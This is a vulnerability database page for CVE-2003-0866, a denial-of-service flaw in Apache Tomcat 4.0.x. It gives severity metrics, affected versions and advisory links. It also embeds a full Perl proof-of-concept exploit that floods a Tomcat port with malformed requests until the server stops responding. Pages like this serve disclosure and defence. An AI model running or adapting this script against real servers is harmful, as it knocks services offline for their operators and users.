CVE-2003-0866 : Detail

CVE-2003-0866

0.88%V3
Network
2003-10-17
02h00 +00:00
2020-02-13
15h07 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The Catalina org.apache.catalina.connector.http package in Tomcat 4.0.x up to 4.0.3 allows remote attackers to cause a denial of service via several requests that do not follow the HTTP protocol, which causes Tomcat to reject later requests.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23245

Publication date : 2003-10-14 22h00 +00:00
Author : Oliver Karow
EDB Verified : Yes

source: https://www.securityfocus.com/bid/8824/info Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types. When certain non-HTTP request types are handled by the Tomcat HTTP connector, the Tomcat server will reject subsequent requests on the affected port until the service is restarted. #!/usr/bin/perl # # PoC - DoS Exploit for Apache Tomcat 4 # by Oliver Karow - oliver.karowNOSPAM__AT__gmx.de # http://www.oliverkarow.de/research/tomcat_crash.txt # # Run this script against the Tomcat Admin Port. After execution, the page will not be accessible any more. # The port is still open and accepting connections, but not responding with content. To verify, connect with your browser # to the port. # use IO::Socket; $ip="192.168.0.16"; $port="8080"; $counter =0; @attackpattern=("'"); for ($x=0;$x<=400;$x++){ $headerLine="GET /dummy/dontexist.pl? HTTP/1.0\n\n"; @temp=split(/(\/)/,$headerLine); foreach (@temp){ $replaceme=$_; foreach(@attackpattern){ $attack=$_; $newheaderline=$headerLine; $newheaderline=~ s/$replaceme/$attack/i; $remote=IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$ip, PeerPort=>$port, Timeout=>5) or die "Connection not possible\n"; print $remote $newheaderline; print "\nRequest: ".$counter++." \t".$newheaderline."\n"; $remote->close; } } }

Products Mentioned

Configuraton 0

Apache>>Tomcat >> Version 4.0.0

Apache>>Tomcat >> Version 4.0.1

Apache>>Tomcat >> Version 4.0.2

Apache>>Tomcat >> Version 4.0.3

Apache>>Tomcat >> Version 4.0.4

Apache>>Tomcat >> Version 4.0.5

Apache>>Tomcat >> Version 4.0.6

References

http://secunia.com/advisories/30908
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.securityfocus.com/bid/8824
Tags : vdb-entry, x_refsource_BID
http://sunsolve.sun.com/search/document.do?assetkey=1-26-239312-1
Tags : vendor-advisory, x_refsource_SUNALERT
http://secunia.com/advisories/30899
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.debian.org/security/2003/dsa-395
Tags : vendor-advisory, x_refsource_DEBIAN